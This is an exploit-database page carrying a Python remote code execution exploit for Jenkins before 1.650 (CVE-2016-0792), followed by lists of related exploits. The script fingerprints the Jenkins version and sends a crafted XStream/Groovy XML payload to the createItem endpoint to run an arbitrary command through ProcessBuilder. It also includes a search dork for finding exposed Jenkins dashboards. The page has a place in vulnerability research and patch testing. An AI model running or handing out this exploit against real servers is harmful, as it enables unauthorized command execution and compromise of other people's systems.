Menu

Search for hundreds of thousands of exploits

"Jenkins < 1.650 - Java Deserialization"

Author

Exploit author

"Janusz Piechówka"

Platform

Exploit platform

java

Release date

Exploit published date

2017-07-30

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
import random
import string
from decimal import Decimal

import requests
from requests.exceptions import RequestException

# Exploit Title: Jenkins CVE-2016-0792 Deserialization Remote Exploit
# Google Dork: intitle: "Dashboard [Jenkins]" + "Manage Jenkins"
# Date: 30-07-2017
# Exploit Author: Janusz Piechówka
# Github: https://github.com/jpiechowka/jenkins-cve-2016-0792
# Vendor Homepage: https://jenkins.io/
# Version: Versions before 1.650 and LTS before 1.642.2
# Tested on: Debian
# CVE : CVE-2016-0792


def prepare_payload(command):
    splitCommand = command.split()
    preparedCommands = ''

    for entry in splitCommand:
        preparedCommands += f'<string>{entry}</string>'

    xml = f'''
        <map>
          <entry>
            <groovy.util.Expando>
              <expandoProperties>
                <entry>
                  <string>hashCode</string>
                  <org.codehaus.groovy.runtime.MethodClosure>
                    <delegate class="groovy.util.Expando"/>
                    <owner class="java.lang.ProcessBuilder">
                      <command>{preparedCommands}</command>
                    </owner>
                    <method>start</method>
                  </org.codehaus.groovy.runtime.MethodClosure>
                </entry>
              </expandoProperties>
            </groovy.util.Expando>
            <int>1</int>
          </entry>
        </map>'''

    return xml


def exploit(url, command):
    print(f'[*] STARTING')
    try:
        print(f'[+] Trying to exploit Jenkins running at address: {url}')
        # Perform initial URL check to see if server is online and returns correct response code using HEAD request
        headResponse = requests.head(url, timeout=30)
        if headResponse.status_code == requests.codes.ok:
            print(f'[+] Server online and responding | RESPONSE: {headResponse.status_code}')
            # Check if X-Jenkins header containing version is present then proceed
            jenkinsVersionHeader = headResponse.headers.get('X-Jenkins')
            if jenkinsVersionHeader is not None:
                # Strip version after second dot from header to perform conversion to Decimal
                stripCharacter = "."
                strippedVersion = stripCharacter.join(jenkinsVersionHeader.split(stripCharacter)[:2])
                # Perform basic version check
                if Decimal(strippedVersion) < 1.650:
                    print(f'[+] Jenkins version: {Decimal(strippedVersion)} | VULNERABLE')
                    # Prepare payload
                    payload = prepare_payload(command)
                    # Prepare POST url
                    randomJobName = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(8))
                    if url.endswith('/'):
                        postUrl = f'{url}createItem?name={randomJobName}'
                    else:
                        postUrl = f'{url}/createItem?name={randomJobName}'
                    print(f'[+] Will POST to {postUrl}')
                    # Try to execute passed command
                    postResponse = requests.post(postUrl, data=payload, headers={'Content-Type': 'application/xml'})
                    print(f'[+] Exploit launched ')
                    # 500 response code is ok here
                    print(f'[+] Response code: {postResponse.status_code} ')
                    if postResponse.status_code == 500:
                        print('[+] SUCCESS')
                    else:
                        print('[-][ERROR] EXPLOIT LAUNCHED, BUT WRONG RESPONSE CODE RETURNED')
                else:
                    print(f'[-][ERROR] Version {Decimal(strippedVersion)} is not vulnerable')
            else:
                print(f'[-][ERROR] X-Jenkins header not present, check if Jenkins is actually running at {url}')
        else:
            print(f'[-][ERROR] {url} Server did not return success response code | RESPONSE: {headResponse.status_code}')
    except RequestException as ex:
        print(f'[-] [ERROR] Request exception: {ex}')
    print('[*] FINISHED')
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-02 "Apache Flink 1.9.x - File Upload RCE (Unauthenticated)" webapps java bigger.wing
2020-10-29 "WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request" webapps java "Mohammed Althibyani"
2020-10-20 "Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution" webapps java "Jonatas Fil"
2020-10-19 "Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in" webapps java "Daniel Morris"
2020-09-09 "Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)" webapps java V1n1v131r4
2020-09-07 "ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)" webapps java Hodorsec
2020-08-10 "ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)" webapps java "Bhadresh Patel"
2020-07-26 "ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection" webapps java aldorm
2020-07-07 "Exhibitor Web UI 1.7.1 - Remote Code Execution" webapps java "Logan Sanderson"
2020-06-04 "VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution" webapps java "Tomas Melicher"
Release Date Title Type Platform Author
2017-07-30 "Jenkins < 1.650 - Java Deserialization" remote java "Janusz Piechówka" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected